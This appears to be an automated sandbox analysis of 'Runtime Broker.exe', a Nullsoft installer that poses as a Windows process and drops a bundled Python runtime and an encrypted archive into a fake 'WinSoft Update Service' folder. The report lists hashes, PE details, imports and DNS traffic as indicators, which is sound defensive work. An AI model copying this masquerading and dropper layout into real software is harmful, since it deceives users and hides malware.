C:\Program Files (x86)\WinSoft Update Service\python3.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58896
Entropy (8bit):	5.838216038576758
Encrypted:	false
SSDEEP:	768:PSvcU+4AjLLDRp9VpBLm6g5YuLIE4k8kF/DFz1OuIwfBSCciqy0oeDOm+FERdI8h:avf+/La5gO6dI8V0lyR
MD5:	167EBEFCF1A2CB0CE7F4118FE826F58B
SHA1:	5D532467D78DCC2B63848452C4F600513B4136CF
SHA-256:	112C98099E5E6156A8844C6C39B2136F3146E1F2221C37B9064AB7AF6FDFABB7
SHA-512:	BCD67BF4F7E5ADBD8E06A28FE3F805F79323369FBE3F37D32A513AA0336F6FFD4E1C7D978FA0480742BA1AE5D91CEB2E255E9D7033D00670E738335387F92E22
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5H..q)d.q)d.q)d..wl.p)d..wd.p)d..w..p)d..wf.p)d.Richq)d.........PE..L...,.:_...........!......................... ............................................@.........................` ..,............................................ ..T............................................................................text............................... ..`.rdata..T.... ......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\python37._pth Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	78
Entropy (8bit):	4.396525104922141
Encrypted:	false
SSDEEP:	3:lovo7JiQbMSFE04MGMZvJS3movn:yvoJh4sZRafv
MD5:	597CD2A66DB50FA966D5E02A7019494E
SHA1:	EFF5ACB902D3F10C694EB214B998C6D7DF831F73
SHA-256:	21BE885FE858372FF76238A939C0E94F0EE9745FB3C7C67D472A1E97219E891D
SHA-512:	99CAFB9433E354A2DD85C5BBBFC39AFD6B2A824C81E5A98C5EA7007B7107F41ACCC50BA856ABD0307E207272389BAE9DD3FCC7F6EF93860560FA6A5B9B4961BF
Malicious:	false
Preview:	python37.zip.......# Uncomment to run site.main() automatically..import site..

C:\Program Files (x86)\WinSoft Update Service\python37.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3441168
Entropy (8bit):	6.692336437440565
Encrypted:	false
SSDEEP:	49152:pEzrIHYnNScEE+Nt9I2RVu5121Cd6vIR57HPNMZnhPsNkTkx2s2MYu4YpZc2j:cBE7/Rag2RhHVMZ6NJF2E4aj
MD5:	465089EACED8159EC533E4A37033E227
SHA1:	074596ADAE6F53F33B8297F02E21F6A6F7AC6FF1
SHA-256:	2B29AE140CB9F08AF872ACF9E17F785EF99398EF3367549B55242BC064D6AE40
SHA-512:	55ECA0922074162C22FFF2B4F97BD2972540FA893B9B02B7D9BFA26345186DBBDAF1FBC37A9EBA6366743D0D42FB5BB88E708877DFD57CB02CA4D3A6953CFB81
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........->..LP.LP.LP.4..LP..Q.LP.4..LP..S.LP..U.LP..T.LP..$Q.LP.LQ..MP...X.jLP...P.LP.....LP...R.LP.Rich.LP.........PE..L...".:_...........!.........D......-........................................P6.......4...@...........................+......,.\|....`4..............h4......p4.X.....+.T...........................(.+.@............................................text............................... ..`.rdata..<...........................@..@.data...`s....,.......,.............@....gfids.......P4.......2.............@..@.rsrc........`4.......2.............@..@.reloc..X....p4.......2.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\python37.zip Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2397350
Entropy (8bit):	7.9909066411345755
Encrypted:	true
SSDEEP:	49152:sv6SW6t9irMq44dMNe1oGX+htyllAa1xuxtBP6XxP48VDVK5iiRA:sCSW64Ie1duhYllA+07h6jyiiu
MD5:	C96BA41BEB9677E28ECB7CC6F2601A09
SHA1:	ACFF8E438A1E4E7CF7DA363A9991D4B415033D3A
SHA-256:	539A79F716CF359DCEAA290398BC629010B6E02E47EAED2356074BFFA072052F
SHA-512:	F970C4324F47092C5FEEC3E3CA02E150950DA91B304DFDEE9AA1A3A6A63E79DD9A8449DF6F2DA9CEC3899973828DAE28E0E4BEE6FD8AA7A9069A2FA721A739E5
Malicious:	false
Preview:	PK..........QW@.............abc.pyc.V.o.E....{..q..VD\|.\..4.H.U........H...$u.k..M#[...T!.J..J..W...r.....z.cJQ..7~og.....hT)!../...>.~..)..x?.7...'.> ...p....7.......m.ma.o._.e.....4...^...9Q.DU...ZT..Q.kDM.....%_..e.....S.....+Q.k.j.k..V.!....G.7.NC...6.M...%..}dz.......4...xobDU.......,.{.C..c......I$........G.`.w.."MX...[;......\|p._.".~,v.?...5.......@M.w..2.q.....#..SF.,t.-Qi...w...&.A<.gp...>...x.Cb..h,..k.B?.3.w.c..j.7^.2A.I..d..).L.Y1%.M...PH.@.....b(+..r.?...P@..i{..<I.G"....%:...........`LU....(..u.=...vJ.V...@.an.I...........-y....Q....,.1u.Y...B....5..K.\)dT.q].I..,y.5S}&e..ks)s.SF...............z..n.Z.9O..+@n.vL.sQ.....Z."a....,...>@........8...@.=......V..SY\|..!G..u.h.Z.:.&.!G.2.h.1`.........A..-.R....#@....&...B..%.m^...%...=.^9+n...5...W...H.r`MM ..\....I.....H.}+....;1R{..K.....C..2.5q..f..ZRV.....){.jX...C?..tx..X.0.,./.9A/J......4O[S;g...'.]...{T.........D....w9N.=vs....7.^4.Cf....G.c......"^...n...\|...@....

C:\Program Files (x86)\WinSoft Update Service\pythonw.exe Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	96272
Entropy (8bit):	6.297697127814762
Encrypted:	false
SSDEEP:	1536:/aaknDoIhIxHHWMpdPa5wiE21M8kJIGFvb1Cwn/l3szSy8:kDpSwMpdCq/IM8uIGfN/l3szO
MD5:	8BB08823E77FC6552CA08085E8574148
SHA1:	9EA47CE675474B8A0003773642A9D397AF19F0AE
SHA-256:	3945C739FD3750D8CA88489B5878F93476D55CAF40E065CC90B6F6EEC6193359
SHA-512:	F23BCD3D1F2C29CE7B359100F7AB8943F6ED5D33F83F4821B6A179B63BC2975EF2230355AF643C071BD20DAB16F5549581DC67D37D6186D8885BE842FF43ACD2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.}`r..3r..3r..3{..3x..3I..2p..3I..2s..3I..2`..3I..2...3..2q..3)..2p..3r..3\..3..2s..3..3s..3..2s..3Richr..3........................PE..L...Y.:_.....................J...............0....@.......................................@..................................4.......`..p5...........^.............. 1..T...........................x1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@......."..............@....gfids..$....P.......$..............@..@.rsrc...p5...`...6...&..............@..@.reloc...............\..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\select.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23568
Entropy (8bit):	6.3163367160293795
Encrypted:	false
SSDEEP:	384:CP0MtNXsSBoYssphKfkOgJYgTiwO5xOJ9qsTdI8qG5inYPLxDG4y827DM:i0ot6YsckkrOgnOmJ9qsTdI8qGcWDG4J
MD5:	D3BF89184B94A4120F4F19F5BCD128D6
SHA1:	C7F22BB0B957BD7103CF32F8958CFD2145EAA5B8
SHA-256:	568EFDC33F1FCC1AF1D030C75FCCEDC2D9B1FCBF49C239726E2CF49D47ADD902
SHA-512:	1DA8EBF323D170C5E9F6BFBB738E60119CCC690A08234DD23F2D9C1A33519FD4AD154805B012CCA3DC7565BEE672D334CA877AFE2B5211E2122DD6E1CE337971
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...Fb..Fb..Fb..>...Fb...c..Fb...a..Fb...g..Fb...f..Fb.+.c..Fb...c..Fb..Fc..Fb.+.j..Fb.+.b..Fb.+....Fb.+.`..Fb.Rich.Fb.........PE..L...>.:_...........!...............2........0......................................NL....@..........................5..L....5..x....`...............B.......p..t....1..T...........................(2..@............0...............................text............................... ..`.rdata..8....0......................@..@.data...p....@.....................@....gfids.......P.......0..............@..@.rsrc........`.......2..............@..@.reloc..t....p.......>..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\sitecustomize.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.19438848899739
Encrypted:	false
SSDEEP:	3:JSn34ERY3cn:koEsc
MD5:	AB68FDABCE788B276E3F83C8007E445E
SHA1:	4C68DC990C0112FAFEA0E1C883E4EAB6FE5DA9D5
SHA-256:	30D94609F29DA733604B0212382898286DF9D39A2A6BFFEF811594970750089A
SHA-512:	08302CD2F48D1EFCF261E73DAEB51B15F5A7A9DDD4662426AE96BC94903790116E868716471BE7C86BC6CE1481A76BDA930E7C673D61385DCDFD8E658A436E70
Malicious:	false
Preview:	import sys..sys.path.insert(0, '')

C:\Program Files (x86)\WinSoft Update Service\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	985616
Entropy (8bit):	6.750787193290997
Encrypted:	false
SSDEEP:	24576:SvvMxkFQyHBGPFxSGv2RAUvMf4NlASKhespB:aExkBHBGyGNABRGewB
MD5:	68FCAE2F9BDB38FDFA4E7826A45A494E
SHA1:	8A3C69F5D9140B07A8FCF578CE479CD4B1295003
SHA-256:	9DC0373E28A45187528591A3ED0EABC4C4A2A6D3EEB8E38C3F451FC11D9E5B48
SHA-512:	8E916967FC1995A68DE2CDF878AC4C5A5C16F226D92B78CE1BB30047F9E6834886791CF7B7F03485AEC5AC0D31DBBA28DEEF2354B1B18D58FD798473F12759C7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...n...n...n...g.3.b...U..l...U..c...U..e...U..e...5.m...n..........o......o....._.o......o...Richn...........PE..L...L.:_...........!.....0..........o........@............................... ......GM....@......................... M..l ...m..................................P\..@I..T............................I..@............@...............................text............0.................. ..`.rdata..X8...@...:...4..............@..@.data................n..............@....gfids..............................@..@.rsrc...............................@..@.reloc..P\.......^..................@..B........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\tcl86t.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1334944
Entropy (8bit):	6.691803855781563
Encrypted:	false
SSDEEP:	24576:WKtPdKQ4rlSyFuExQlFwDjdIUhe6mf2iId7UlyKWUCAqBkmIqzS/w+Tds2YxJQ0h:3PdRhUBlKlRtqt9+TSMzi9
MD5:	30195AA599DD12AC2567DE0815ADE5E6
SHA1:	AA2597D43C64554156AE7CDB362C284EC19668A7
SHA-256:	E79443E9413BA9A4442CA7DB8EE91A920E61AC2FB55BE10A6AB9A9C81F646DBB
SHA-512:	2373B31D15B39BA950C5DEA4505C3EAA2952363D3A9BD7AE84E5EA38245320BE8F862DBA9E9AD32F6B5A1436B353B3FB07E684B7695724A01B30F5AC7BA56E99
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........dhl^..?^..?^..?.m.>\..?...?Z..?.m.>R..?.m.>T..?.m.>T..?W}.?L..?\|e.>_..?\|e.>S..?^..?H..?2m.>...?2m.>_..?2m.?_..?2m.>_..?Rich^..?........PE..L......\...........!.................................................................Z....@.............................._......T.......0............D...............*...............................+..@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...0...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\tk86t.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1201824
Entropy (8bit):	6.383461671904386
Encrypted:	false
SSDEEP:	24576:sJI8MkBaMq104jq+QOtaHex6jXcT6Qvy8a48BbUfS0dvjcANkQvgL+Tm4Kp:BhqOtarL8M8fBjcPQvgL5Z
MD5:	6CADEC733F5BE72697D7112860A0905B
SHA1:	6A6BEEEF3B1BB7C85C63F4A3410E673FCE73F50D
SHA-256:	19F70DC79994E46D3E1EF6BE352F5933866DE5736D761FAA8839204136916B3F
SHA-512:	E6B3E52968C79D4BD700652C1F2EBD0366B492FCDA4E05FC8B198791D1169B20F89B85EC69CEFA7E099D06A78BF77FF9C3274905667F0C94071F47BAFAD46D79
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(...l..l..l..>..n..>..h..>...f..>...f..N..o..e.W.\|..N..y..l..*~..........m....;.m.....m..Richl..........PE..L...1..\...........!.........<............... ...............................p............@.........................PF..D@......\|........{...........<..........0....B...............................B..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data....\.......T..................@....rsrc....{.......\|..................@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	901264
Entropy (8bit):	6.826205791239478
Encrypted:	false
SSDEEP:	24576:Xqaw9o0qF2u2EjKz7TVONmLwtRE0emcvIZPoy4NdW:Dw9DSjK+mwt2s
MD5:	5B55E9A1360A6C52CC988DA6804D6CA2
SHA1:	AB36F680029C672B885D52AE376B80B4752F5F80
SHA-256:	AB2BBEC93FA2AF707D9C55B3DB442DDE6561D1799E53E74C7F6345252989798C
SHA-512:	B7B3116BAD981464155D1C8B0A0DB0793661F73FFA20D1E37E52F3A3785635AFE1B803E65D657213ADFE2D6A972E84DA10050F31522E8ACCE27B65F2A8BC4261
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L...s..U...........!................0...............................................1.....@A........................p,..f....2.......P...................@...`..`X..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..`X...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\unicodedata.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1063440
Entropy (8bit):	5.335145703200824
Encrypted:	false
SSDEEP:	12288:q3eYbeoEYa6l0SYx7tHcQJPREI+V/IF+7agsSJNzkRoEVCTRPmrZ6wBj:q3eBN6axxcCr+VU+7agnNcITRopp
MD5:	22EE48112415EE74C80B66CC1A8E1CA8
SHA1:	9EB11B06BA0EA22A2F339D0CE300F45F48607D4C
SHA-256:	8F38B8891C74DA4AF150B60D21053CDA95A61881C61B8FFF1C8852885DE8B2AF
SHA-512:	080DA19FCBFCFDD55BCCF231F6F4820204707AE3A08DE7E40CE8E1F87DF1EDD916FD55A37E6560C1E1A6935DDC42D47DCE82AA834A8287B024D907CC9B98B3CE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,F..B...B...B......B..C...B..A...B..G...B..F...B.u.C...B...C...B...C...B.u.J...B.u.B...B.u.....B.u.@...B.Rich..B.........PE..L...?.:_...........!.....4...........4.......P...............................`......V.....@..........................Q..X...HR.......@............... .......P.......N..T...........................XN..@............P...............................text...N2.......4.................. ..`.rdata.......P.......8..............@..@.data...(....`.......B..............@....gfids.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83768
Entropy (8bit):	6.846131048807189
Encrypted:	false
SSDEEP:	1536:0aYGvQ2+kLJ4AE6ZkJrIriwx0AKGsu0g1kqAecbRyDlB6kVaY:0a7vQ2+KJ4AE0sAKxQAecbRyDlNZ
MD5:	AEAB74DB6BC6C914997F1A8A9FF013EC
SHA1:	6B717F23227D158D6AA566498C438B8F305A29B5
SHA-256:	18CCB2DD8AF853F4E6221BB5513E3154EF67AE61CEE6EC319A8A97615987DC4B
SHA-512:	A2832B7720599361E2537F79A2597ACB1A2D5633FDFE20A0D1075E9457683FDB1D5676D121C0BF1A825FF99512DCD924254F1151B50AAE922ACC0CC10F461036
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c..'...'...'....Yf.%.....>.,...'...........7.......4.......#.......?.......&.....R.&.......&...Rich'...................PE..L......Z.........."!........."...............................................P............@A........................P................0..................8?...@..p.......8...............................@............................................text...d........................... ..`.data...d...........................@....idata..............................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc..p....@......................@..B........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\winsound.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24592
Entropy (8bit):	6.380476493968974
Encrypted:	false
SSDEEP:	768:8884wCk23o6oGLM1BO0MvpI8s7bWDG4yMf:t84rkYM1BvMvpI8s72yMf
MD5:	E5892CEBA7B672738704890877D13CF1
SHA1:	C708ECDAE79D2D086171901BBBA68B4D9A22EC91
SHA-256:	729956F583AEC78ADC3A0B2A0DBD0635C8B96812740F66144356BD7046FE8C7E
SHA-512:	C015C4327D5B4C14DB26FF246BA0EF2EDA99F303EEF67F2B459137D424D143990F98726FFC610D214A83DA8E0EDE794F960EE90D05BD18001B67B0A43A2FC75B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w..3..U3..U3..U:.qU1..U...T1..U...T2..U...T9..U...T8..U...T1..Uh..T4..U3..U...U...T2..U...T2..U...U2..U...T2..URich3..U........................PE..L...?.:_...........!.........*...............0............................................@......................... 7..P...p7.......`...............F.......p......03..T............................3..@............0...............................text............................... ..`.rdata..~....0....... ..............@..@.data........@......................@....gfids.......P.......4..............@..@.rsrc........`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsg2001.tmp Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	data
Category:	dropped
Size (bytes):	27621747
Entropy (8bit):	7.126550276691505
Encrypted:	false
SSDEEP:	393216:KUaamAP1CPwDv3uFg1U2lvzn0EcuTGFtEdNI/UlUd16aMpMeQDLUgDSmNK:KUaabaAKT16aMAxGmA
MD5:	BCFA9670BFE44777D3B12CF347BDAC1B
SHA1:	537E50AB70FF35AB2FAE260056075D6017712D5F
SHA-256:	03F75393BF91D86FCB65B492C3A3EA11D24B05A9F7E09143517617D660346D53
SHA-512:	34BEED308437E8CDD0ED9052127E7398F9D546E302EFEFC01BEDE41C6550229BB32B7BE26A739963BC030B771934CEC216720E1A973502AF3F671A6AAA45C938
Malicious:	false
Preview:	........,.......,.......\.......Xb......X...................................................................................................................................................................................................................................................G...J..............a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.999909838890384
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Runtime Broker.exe
File size:	18595672
MD5:	abc7a9c5b732b72a8f47fd85ee638c09
SHA1:	9876415085f95c02d6bcea9b1fc990d5b5c50d1c
SHA256:	d9ebb6958afcd1907651487062108ec56a2af9eb935f2437156584081cb56b2f
SHA512:	dc859f879f10353208626b49c28d4031cdaeee79bfc05125671f425f5f23ebb06b30422003a3ab73398171a21c46e3aa9e193c0e70ac60dcb636e2ff2618d6b8
SSDEEP:	393216:Nnth89b9hPjaWpw6MrB10G6dtx5zhEKX83YJM6uyD/uLHztUP8S2k9:Ntu9b9ZOYdtnz9X83Ku3Dk9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....

File Icon


Icon Hash:	e0d08cf8d8ccc8e0

Static PE Info

General
Entrypoint:	0x4035d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D702 [Sat Aug 1 02:44:18 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c05041e01f84e1ccca9c4451f3b6a383

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080C8h]
call dword ptr [004080CCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A26Ch], eax
je 00007F26A49F3773h
push ebx
call 00007F26A49F6A79h
cmp eax, ebx
je 00007F26A49F3769h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F26A49F69F3h
push esi
call dword ptr [00408154h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F26A49F374Ch
push 0000000Bh
call 00007F26A49F6A4Ch
push 00000009h
call 00007F26A49F6A45h
push 00000007h
mov dword ptr [0042A264h], eax
call 00007F26A49F6A39h
cmp eax, ebx
je 00007F26A49F3771h
push 0000001Eh
call eax
test eax, eax
je 00007F26A49F3769h
or byte ptr [0042A26Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408298h]
mov dword ptr [0042A338h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 00421708h
call dword ptr [0040818Ch]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0x3ec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6572	0x6600	False	0.662300857843	data	6.45391938596	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1398	0x1400	False	0.449609375	data	5.13671758274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20378	0x600	False	0.5078125	data	4.09680908363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2b000	0x10000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3b000	0x3ec0	0x4000	False	0.633117675781	data	5.9948634701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3b2b0	0x10a8	data	English	United States
RT_ICON	0x3c358	0xea8	data	English	United States
RT_ICON	0x3d200	0x8a8	data	English	United States
RT_ICON	0x3daa8	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3e010	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3e478	0x2e8	data	English	United States
RT_ICON	0x3e760	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x3e888	0x100	data	English	United States
RT_DIALOG	0x3e988	0x11c	data	English	United States
RT_DIALOG	0x3eaa8	0x60	data	English	United States
RT_GROUP_ICON	0x3eb08	0x68	data	English	United States
RT_MANIFEST	0x3eb70	0x34b	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2021 07:28:21.522675991 CET	56627	53	192.168.2.4	8.8.8.8
Nov 26, 2021 07:28:21.542368889 CET	53	56627	8.8.8.8	192.168.2.4
Nov 26, 2021 07:28:21.584315062 CET	56621	53	192.168.2.4	8.8.8.8
Nov 26, 2021 07:28:21.725790977 CET	63116	53	192.168.2.4	8.8.8.8
